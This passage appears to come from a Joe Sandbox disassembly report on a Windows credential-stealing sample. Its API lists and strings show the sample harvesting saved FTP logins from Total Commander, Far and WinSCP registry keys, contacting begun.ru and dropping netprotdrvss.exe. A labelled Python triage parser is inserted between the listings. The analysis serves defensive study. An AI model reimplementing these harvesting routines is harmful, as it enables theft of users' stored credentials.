• GetLastError.KERNEL32(?), ref: 00403258
Strings
Memory Dump Source
• Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
Similarity
• API ID: ErrorLast$CurrentDirectoryFileModuleName_memset
• String ID: .html$4@$8@$8@$From: $Via: $^client=$^key=$file$none
• API String ID: 2247176544-2288798624
• Opcode ID: 9ae992922a2ad1b825f1490aaeac56172bb5fbdf92c9f9a8e97600dc8421b205
• Instruction ID: 295a2e83bb6b363340795eecc9968ea2d400926a6410b4e4a91bd94f8c6abde8
• Opcode Fuzzy Hash: 9ae992922a2ad1b825f1490aaeac56172bb5fbdf92c9f9a8e97600dc8421b205
• Instruction Fuzzy Hash: 01B17E72A001199BCB24EF61CD91AEB77A9EF44304F4040BFF519E7291EA389A858F59

Control-flow Graph

control_flow_graph 307 40b096-40b0ac call 40d5b0 310 40b0b5-40b0bb 307->310 311 40b0ae-40b0b0 307->311 313 40b0bd-40b0cd call 407995 310->313 314 40b0cf-40b0d1 call 407951 310->314 312 40b2c9-40b2cd 311->312 318 40b0d6-40b0e5 313->318 314->318 319 40b160-40b166 318->319 320 40b0e7-40b0f1 318->320 321 40b177 InternetClearAllPerSiteCookieDecisions 319->321 322 40b168-40b175 InternetSetPerSiteCookieDecisionW 319->322 320->319 323 40b0f3-40b0f9 320->323 324 40b17d-40b184 call 4032b8 321->324 322->324 323->319 325 40b0fb-40b10b GetModuleFileNameW 323->325 332 40b186-40b196 GetLastError call 40a786 324->332 333 40b199-40b1a2 324->333 327 40b116-40b118 GetCurrentDirectoryW 325->327 328 40b10d-40b114 call 406cf9 325->328 330 40b11e-40b15a call 405511 call 4054ed call 40253c 327->330 328->330 330->311 330->319 332->333 337 40b1a9-40b1ae 333->337 340 40b1b0-40b1cd CreateThread 337->340 341 40b1ce-40b1df 337->341 340->341 341->337 343 40b1e1-40b1e7 341->343 345 40b1e9-40b1eb 343->345 346 40b1ed-40b200 call 40a786 343->346 345->346 348 40b221-40b226 345->348 355 40b202-40b209 call 40b023 346->355 356 40b20e-40b210 346->356 351 40b228-40b23b CloseHandle 348->351 352 40b23d-40b24b call 40a6c9 InternetClearAllPerSiteCookieDecisions 348->352 351->351 351->352 360 40b2c6-40b2c8 352->360 361 40b24d-40b257 352->361 355->356 356->348 359 40b212-40b21b WaitForMultipleObjects 356->359 359->348 360->312 361->360 362 40b259-40b25f 361->362 362->360 363 40b261-40b271 GetModuleFileNameW 362->363 364 40b273-40b27a call 406cf9 363->364 365 40b27c-40b27e GetCurrentDirectoryW 363->365 367 40b284-40b2c0 call 405511 call 4054ed call 40253c 364->367 365->367 367->311 367->360
APIs
• GetModuleFileNameW.KERNEL32(00000000,00420840,00001000,00000000,00000000,00000000,?,0040B320,00000000,?,0040B3E0), ref: 0040B103
• InternetSetPerSiteCookieDecisionW.WININET(begun.ru,00000005), ref: 0040B16F
• GetLastError.KERNEL32(00000004,?,0040B320,00000000,?,0040B3E0), ref: 0040B188
• CreateThread.KERNEL32(00000000,00000000,Function_0000B023,?,00000000,00000000), ref: 0040B1C3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
Similarity
• API ID: CookieCreateDecisionErrorFileInternetLastModuleNameSiteThread
• String ID: \netprotdrvss.exe$begun.ru
• API String ID: 2887986221-2660752650
• Opcode ID: ad6e69e745eb0134cfaa1d61605679bf99b5aa58cc3a10e76cbc4c8091dfe4a8
• Instruction ID: dc85dbecd2d93a1c92e95c54703b850062b4355e184197ecdf44903e32880826
• Opcode Fuzzy Hash: ad6e69e745eb0134cfaa1d61605679bf99b5aa58cc3a10e76cbc4c8091dfe4a8
• Instruction Fuzzy Hash: 4351F571A00218BBEB206F65DC89AAF3769EB44349F00447BF904BA1D1D77C8D51CBAE
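The two function entries above (402e3e, which builds a path from GetModuleFileNameW/GetCurrentDirectoryW and carries the `From: `, `Via: `, `^client=`, `^key=` strings, and 40b096, which calls InternetSetPerSiteCookieDecisionW on `begun.ru`, starts a thread at Function_0000B023 and references `\netprotdrvss.exe`) are the kind of listing an analyst walks by hand. The script below is an added example, not part of the Joe Sandbox report or of the sample's code: it parses lines in the report's own `• Api.MODULE(args), ref: ADDR` and `• String ID: a$b$c` form into a per-function capability and indicator summary. The embedded input is copied from those two entries (de-indented); the capability prefix table, the indicator heuristics and the choice to label each entry by its lowest direct call address are this example's own conventions, not Joe Sandbox's.

```python
"""Turn Joe Sandbox per-function "APIs" / "String ID" listings into a triage summary.

Added example, not part of the report. Assumed input shape: one function entry per
blank-line-separated block; API lines "• Api.MODULE(args), ref: ADDR", optionally
prefixed "Part of subcall function ADDR:"; strings under "• String ID:" joined by "$".
"""
import re

# Copied from the 402e3e and 40b096 entries of this report (indentation removed).
SAMPLE = """\
APIs
  • Part of subcall function 004058FB: _memset.LIBCMT ref: 0040591C
• GetModuleFileNameW.KERNEL32(00000000,00420840,00001000), ref: 00402EC3
• GetCurrentDirectoryW.KERNEL32(00001000,00420840), ref: 00402EDC
• GetLastError.KERNEL32(?), ref: 00402F4E
• GetLastError.KERNEL32 ref: 00403237
Similarity
• API ID: ErrorLast$CurrentDirectoryFileModuleName_memset
• String ID: .html$4@$8@$8@$From: $Via: $^client=$^key=$file$none

APIs
• GetModuleFileNameW.KERNEL32(00000000,00420840,00001000,00000000,00000000,00000000,?,0040B320,00000000,?,0040B3E0), ref: 0040B103
• InternetSetPerSiteCookieDecisionW.WININET(begun.ru,00000005), ref: 0040B16F
• GetLastError.KERNEL32(00000004,?,0040B320,00000000,?,0040B3E0), ref: 0040B188
• CreateThread.KERNEL32(00000000,00000000,Function_0000B023,?,00000000,00000000), ref: 0040B1C3
Similarity
• String ID: \\netprotdrvss.exe$begun.ru
"""

API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[\w.@]+?)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
STR_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<strs>.*)$")

# Win32 name prefix -> capability tag (example's own table; extend as needed).
CAPABILITIES = {
    "network": ("Internet", "WinHttp", "Http", "connect", "send", "recv", "socket"),
    "thread": ("CreateThread", "CreateRemoteThread"),
    "process": ("CreateProcess", "ShellExecute", "WinExec"),
    "registry": ("RegOpenKey", "RegQueryValue", "RegSetValue", "RegCreateKey"),
    "filesystem": ("GetModuleFileName", "GetCurrentDirectory", "PathRemoveFileSpec",
                   "SHGetFolderPath", "ExpandEnvironmentStrings", "CreateFile", "CopyFile"),
    "config": ("GetPrivateProfileString",),
}

# Heuristics for values worth pulling out of args/strings. A bare ".html" suffix is
# not a file name, so the file pattern requires a character before the dot.
IOC_PATTERNS = [
    ("file", re.compile(r"[\w-]\.(?:exe|dll|sys|html)$", re.I)),
    ("domain", re.compile(r"^[a-z0-9-]+(?:\.[a-z0-9-]+)+$")),
    ("registry", re.compile(r"^(?:HKEY_|HKLM\\|HKCU\\|SOFTWARE\\)", re.I)),
]


def parse_api_line(line):
    """Return {'api','mod','args','ref','sub'} for an API line, else None."""
    m = API_RE.match(line)
    if not m:
        return None
    args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
    return {"api": m.group("api"), "mod": m.group("mod"), "args": args,
            "ref": m.group("ref").upper(), "sub": m.group("sub")}


def parse_strings(line):
    """Split a String ID line on '$'. A literal '$' inside a string cannot be
    told apart from the separator, so empty fields are dropped, not guessed."""
    m = STR_RE.match(line)
    return [s for s in m.group("strs").split("$") if s] if m else None


def classify(api):
    return {tag for tag, prefixes in CAPABILITIES.items() if api.startswith(prefixes)}


def iocs_from(values):
    return {v for v in values if any(p.search(v) for _, p in IOC_PATTERNS)}


def summarize(text):
    """Map each entry (labelled by its lowest direct call address) to a summary."""
    result = {}
    for block in re.split(r"\n\s*\n", text.strip()):
        calls, strings = [], []
        for line in block.splitlines():
            c = parse_api_line(line)
            if c:
                calls.append(c)
                continue
            s = parse_strings(line)
            if s:
                strings.extend(s)
        if not calls:
            continue
        direct = [c for c in calls if c["sub"] is None] or calls
        tags, iocs, starts = set(), iocs_from(strings), []
        for c in calls:
            tags |= classify(c["api"])
            iocs |= iocs_from(c["args"])
            if c["api"].startswith("CreateThread"):
                starts += [a for a in c["args"] if a.startswith("Function_")]
        result[min(c["ref"] for c in direct)] = {
            "apis": [c["api"] for c in direct],
            "subcall_apis": [c["api"] for c in calls if c["sub"]],
            "tags": sorted(tags), "iocs": sorted(iocs),
            "thread_starts": starts, "strings": strings,
        }
    return result


if __name__ == "__main__":
    for label, e in summarize(SAMPLE).items():
        print(label, e["tags"], e["iocs"], e["thread_starts"])
```

Run against the whole "Disassembly" section of a report, the summary gives a quick map of which functions touch the network, start threads or read configuration, and which indicator strings (here `begun.ru` and `\netprotdrvss.exe`) belong to which function; entries whose only strings are format fragments such as `From: ` or `^client=` yield no indicators, which is the intended behaviour of the heuristics.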

Control-flow Graph

control_flow_graph 375 403c10-403c73 call 40be9d call 405511 * 2 call 40848f 384 403c75-403c77 375->384 385 403ca9-403cad 375->385 384->385 386 403c79-403c94 ExpandEnvironmentStringsW 384->386 387 403cb3-403d15 call 405511 * 3 385->387 388 403dfe 385->388 389 403c95 call 4039ea 386->389 404 403d18-403d34 SHGetFolderPathW 387->404 390 403e00-403e08 call 4033a0 388->390 391 403e0a-403e12 call 40be3a 388->391 393 403c9a-403ca3 PathRemoveFileSpecW 389->393 400 403e13-403e17 390->400 391->400 405 403d36-403d39 404->405 406 403d7f-403d86 404->406 408 403d5a 405->408 409 403d3b-403d58 call 4039a3 405->409 406->404 407 403d88-403d8c 406->407 407->388 412 403d8e-403dce call 405511 * 2 call 40848f 407->412 411 403d5c-403d76 408->411 409->411 414 403d77 call 408248 411->414 422 403dd0-403dd2 412->422 423 403dfa 412->423 416 403d7c 414->416 416->406 422->423 424 403dd4-403df7 ExpandEnvironmentStringsW call 4039a3 422->424 423->388 424->423
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403C84
                                                                                                                                                                                                                  • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
                                                                                                                                                                                                                  • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                                                                                                                                                                                                                  • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
                                                                                                                                                                                                                  • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                                                                                                                                                                                                                  • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                                                                                                                                                                                                                  • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                                                                                                                                                                                                                • PathRemoveFileSpecW.SHLWAPI(?), ref: 00403CA3
                                                                                                                                                                                                                  • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00403D2C
                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403DDF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocEnvironmentExpandPathPrivateProfileStringStrings$FileFolderFreeOpenRemoveSpec
                                                                                                                                                                                                                • String ID: #$$$&$*ghisler*$*total*commander*$*totalcmd*$SOFTWARE\Ghisler\Total Commander$ftpininame$installdir
                                                                                                                                                                                                                • API String ID: 2046068145-3914982127
                                                                                                                                                                                                                • Opcode ID: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                                                                                                                                                                                                                • Instruction ID: e3ad36e3959a395177e0e2b587ea9ce0600459653a05a841f57562a17ae86195
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF516D72D0010CABDB10DAA1DC85FDF77BCEB44305F1044BBE515F2181EA789B898B65

Control-flow Graph (legend: Executed / Not Executed; rendered graph for function 004027E6 omitted, block list not reproduced)
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 004027F5
                                                                                                                                                                                                                  • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                                                                                                                                                                                                                  • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Internet$InitializeOpenOption
                                                                                                                                                                                                                • String ID: From: true
                                                                                                                                                                                                                • API String ID: 1176259655-9585188
                                                                                                                                                                                                                • Opcode ID: 97ee820607911564f81d2c28c98cc723bebeae55605858c30cb2ec0cfeb5fbf8
                                                                                                                                                                                                                • Instruction ID: 80b93d55993982ee294e6d3758cd093c071ceb3c0ab782597868a4ea0391af47
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 97ee820607911564f81d2c28c98cc723bebeae55605858c30cb2ec0cfeb5fbf8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89C1E371E00219AFDF20AFA5CD49A9E77B5AB04304F10447BF814B32D2D6B89D41CFA9

Control-flow Graph (legend: Executed / Not Executed; rendered graph for function 004041E4 omitted, block list not reproduced)
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 004041FD
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,00000008), ref: 004042B3
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00404373
                                                                                                                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404419
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040442A
                                                                                                                                                                                                                  • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HeapOpen$AllocCloseEnumFree
                                                                                                                                                                                                                • String ID: SOFTWARE\Far2\Plugins\ftp\hosts$SOFTWARE\Far\Plugins\ftp\hosts$ftp://%s:%s@%s$hostname$password$user$username
                                                                                                                                                                                                                • API String ID: 416369273-4007225339
                                                                                                                                                                                                                • Opcode ID: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
                                                                                                                                                                                                                • Instruction ID: d928ca8cdb490927e602bcc25cbe761e1e9ca2c88fd961b6a2cac4e28df6e2a2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF717DB2900118ABCB20EB95CD45EEFBBBDEF48314F10457BF615F2181EA349A458B69
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000008,00000C20,?,00000000,00000008), ref: 00404542
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 004045DA
                                                                                                                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404605
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040476D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocCloseEnumHeapOpen
                                                                                                                                                                                                                • String ID: SOFTWARE\martin prikryl\winscp 2\sessions$ftp://%s:%s@%s:%u$hostname$password$portnumber$username
                                                                                                                                                                                                                • API String ID: 3497950970-285550827
                                                                                                                                                                                                                • Opcode ID: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                                                                                                                                                                                                                • Instruction ID: 619369561540f7679ee4dce6ffb5b1aea82e2176e3673c83278f81db5409ea06
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE715DB2900119AFDB10DBD5CD81AEF77BCEB48308F10447AE605F3291EB389E458B68
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • InternetOpenUrlW.WININET(?,hOA,?,00000000,04400000,00000000), ref: 00409CCB
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00002001,?,?,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF4
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF7
                                                                                                                                                                                                                • InternetReadFile.WININET(?,?,00001000,?), ref: 00409D6E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000002,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D80
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D83
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE3
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocInternet$FileFreeOpenRead
                                                                                                                                                                                                                • String ID: hOA
                                                                                                                                                                                                                • API String ID: 1355009786-3485425990
                                                                                                                                                                                                                • Opcode ID: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                                                                                                                                                                                                                • Instruction ID: 638041e7f74e2b46c75c1535d5ef76f15aa532bf5b3977fbb34850ab96fc5943
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B418B71900209FFEB119F65C844BAA7BA9FF44355F14847AF819E6292E778CE80CF54
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CountTick
                                                                                                                                                                                                                • String ID: .html$0$8@$From: $Page generated at: $Via: $^key=$^nocrypt$hOA
                                                                                                                                                                                                                • API String ID: 536389180-1762329985
                                                                                                                                                                                                                • Opcode ID: 84a0e12b251b3718d34eddf76b775ad89a92ce41e4fff3615f2568cd6720db27
                                                                                                                                                                                                                • Instruction ID: 73e0daeea7a9f5f4b783dd0519eebdf5205f1bdf48cad4214514e0173d2ce6b9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84a0e12b251b3718d34eddf76b775ad89a92ce41e4fff3615f2568cd6720db27
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27416131A0161997CB25EBA2DC51BDE7369FF44308F0044BFB909B71C1EA78AE948F59
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CharLowerW.USER32(?,?,?,?,?,?,+@,004089CD,?,?,?), ref: 0040933E
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00409359
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00409362
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 004093B8
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(javascript), ref: 004093C1
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 004093E3
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 004093E6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: String$Free$Alloc$CharLower
                                                                                                                                                                                                                • String ID: http:$javascript$+@
                                                                                                                                                                                                                • API String ID: 1987340527-3375436608
                                                                                                                                                                                                                • Opcode ID: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                                                                                                                                                                                                                • Instruction ID: 0b4048b57b081e67726dd44363989906ad2532c65c6ed0c60c908aefe346602b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A310A71A00119AFDB04DFA6C889EAEB7B8EF48314B144469E805EB291D775AD41CF64
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                • String ID: .html$8@$CsM$From: $Via: $^key=$ftp$hOA
                                                                                                                                                                                                                • API String ID: 3472027048-1081452883
                                                                                                                                                                                                                • Opcode ID: 74b6ecad85d8563e453e52ab39e53749c12d05251352443c8ee161ef9de2affd
                                                                                                                                                                                                                • Instruction ID: 3376cbd9a830c5581772f61034da1910d267ee329a165acd0f4726bddbbbde03
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 74b6ecad85d8563e453e52ab39e53749c12d05251352443c8ee161ef9de2affd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E419431A0091887CB24E7A29D529EF73A9EF40318F54407FE905B71D1EA7C9E898F5D
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VariantClear.OLEAUT32(00000016), ref: 00408E7A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ClearVariant
                                                                                                                                                                                                                • String ID: _self$http$+@
                                                                                                                                                                                                                • API String ID: 1473721057-3317424838
                                                                                                                                                                                                                • Opcode ID: 318762bed40dfdc809c59a68404d151adbfac834f26e4a68fdc08c116542e79f
                                                                                                                                                                                                                • Instruction ID: ae9540e34d1dd6ebd4224328a85202065bb39baa52f6123ff81f2465f468f74f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 318762bed40dfdc809c59a68404d151adbfac834f26e4a68fdc08c116542e79f
